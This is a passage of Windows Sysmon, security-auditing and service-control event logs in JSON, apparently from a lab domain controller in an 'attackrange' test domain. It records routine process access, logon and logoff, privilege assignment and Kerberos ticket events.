05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5391,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220615,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220616,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76857,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The AppX Deployment Service (AppXSVC) service entered the running state.","param1":"AppX Deployment Service (AppXSVC)","param2":"running","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76858,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Client License Service (ClipSVC) service entered the running state.","param1":"Client License Service (ClipSVC)","param2":"running","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220617,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9C3A4\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9c3a4","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220618,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9D9DC\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9d9dc","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220619,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9E61B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9e61b","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220620,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220621,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{239F3300-5494-A84E-2FA9-933D49F9F6FA}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{239F3300-5494-A84E-2FA9-933D49F9F6FA}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220622,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{239F3300-5494-A84E-2FA9-933D49F9F6FA}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{239F3300-5494-A84E-2FA9-933D49F9F6FA}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220623,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA523F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{239F3300-5494-A84E-2FA9-933D49F9F6FA}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa523f","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{239F3300-5494-A84E-2FA9-933D49F9F6FA}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220624,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA523F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa523f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220625,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA523F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa523f","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
